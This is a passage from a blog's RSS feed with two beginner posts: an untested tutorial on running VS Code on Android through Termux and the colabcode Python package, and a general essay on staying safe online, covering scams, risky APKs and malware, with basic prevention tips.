      <link>https://dev.to/proharshit/install-vscode-in-android-new-method-2021-57m5</link>
      <guid>https://dev.to/proharshit/install-vscode-in-android-new-method-2021-57m5</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Today I am going to show you how you can install vscode in android with new method.&lt;br&gt;
So lets get started&lt;/p&gt;

&lt;p&gt;Firstly install Termux from Play Store&lt;/p&gt;

&lt;p&gt;Then upgrade packages&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install python&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;python &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install Colabcode module&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;pip&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;colabcode&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It may take longer time but not more than 15 mins (maybe)&lt;/p&gt;

&lt;p&gt;Then import ColabCode&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;colabcode&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ColabCode&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;ColabCode&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I have not tested it yet.It was originally launched for Google Colab.&lt;/p&gt;

&lt;p&gt;Thank you&lt;br&gt;
'Follower Goal 50'&lt;br&gt;
Pls tell how did you like it&lt;/p&gt;

</description>
      <category>vscode</category>
      <category>programming</category>
      <category>beginners</category>
      <category>opensource</category>
    </item>
    <item>
      <title>My Ideas About A Safe And Peaceful Cyber Space</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Sat, 21 Aug 2021 08:37:45 +0000</pubDate>
      <link>https://dev.to/proharshit/my-ideas-about-a-safe-and-peaceful-cyber-space-3bei</link>
      <guid>https://dev.to/proharshit/my-ideas-about-a-safe-and-peaceful-cyber-space-3bei</guid>
      <description>&lt;p&gt;Introduction&lt;/p&gt;

&lt;p&gt;The internet is an important part of the world today.From communicating to banking,from studying to shopping, from business managing to travelling,we use internet everywhere.But so has increased the need to protect our data.A computer does not have its own mind to do anything,so we own should have proper measures to save it.&lt;br&gt;
*Fact - Every month, 6000 new viruses are created.&lt;/p&gt;

&lt;p&gt;Dangers or Cyber Attacks&lt;/p&gt;

&lt;p&gt;In today's generation,internet is a digital jungle and has many dangers in it. So we need to know these dangers and measures to prevent them.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Data Loss or Data Theft&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Data Loss to an individual or an organization,both can be dangerous.Data Theft can be done by many means,for example if you visit an infected website or download a file that contains a trojan or malware.&lt;br&gt;
*Prevention&lt;br&gt;
Data loss can be prevented by using a cloud storage such as Google Drive,One Drive or external storage such as PenDrive or External Hard Disk.Data Theft can be prevented by installing a strong antivirus such as Avast or any other to prevent visiting an blacklisted website or download of malwares.&lt;/p&gt;

&lt;p&gt;2.Hacking&lt;/p&gt;

&lt;p&gt;Today,there are many means of hacking.Hackers hack your device without your permission.Inproper settings to save your information on social media websites can result in money loss also.&lt;br&gt;
*Prevention&lt;br&gt;
Keep your settings up-to-date whether device's or account's.Check whether anything happens suspicious or unexpected.Report directly to the authorities if it happens.&lt;br&gt;
Any links asking to provide your information are dangerous surely.Do not tap or reply to any such emails.&lt;/p&gt;

&lt;p&gt;3.Online Offers At Rate of Rs.0 (Really?)&lt;/p&gt;

&lt;p&gt;Nowadays many scammers have found a way to steal money.You may have seen many online offers or surveys that offer you iPods,Tablets,Laptops and many things at Rs.0 but ask you for credit cards.Such websites or surveys lead to phishing and location tracing.&lt;br&gt;
*Prevention&lt;br&gt;
Prevention is very simple.Just leave your greed somewhere else and do not complete them or provide any information.&lt;/p&gt;

&lt;p&gt;4.Android Package Kits&lt;/p&gt;

&lt;p&gt;Android Package Kits are .apk files that can install android apps without Google Play store.They are used when someone is having problen with the Google Play Store Application but can also be dangerous if harmful apk containing virus is installed on your device.They may open unwanted web pages or send data behind your back.&lt;br&gt;
*Prevention&lt;br&gt;
Check whether Unknown Sources is not enabled on your device.&lt;br&gt;
To do this, open up your settings and search for Unknown Sources.If it is enabled disable it.Do not download and install Apks from unknown sites.Always use Apkpure.com And Apkmirror.com if required.Do not disable Google Play Protect.&lt;/p&gt;

&lt;p&gt;5.Bots&lt;br&gt;
As apks are harmful for Android devices,similarly bots are harmful for both mobile and laptop devices.They can open unwanted webpages and send personal data.They are made up for Python,C,Java and many more system languages even.&lt;br&gt;
*Prevention&lt;br&gt;
Prevention is very simple.Do not download just any file from web and execute it.&lt;/p&gt;

&lt;p&gt;So we saw that how our devices can be infected with different things and preventive measures for it.&lt;/p&gt;

&lt;p&gt;I hope you liked today's blogpost.Thank you.Have a nice day.Do visit my blog for new posts.&lt;br&gt;
------------☺☺☺------------&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>informationtechnology</category>
      <category>cybersecurityday</category>
      <category>30november</category>
    </item>
  </channel>
</rss>
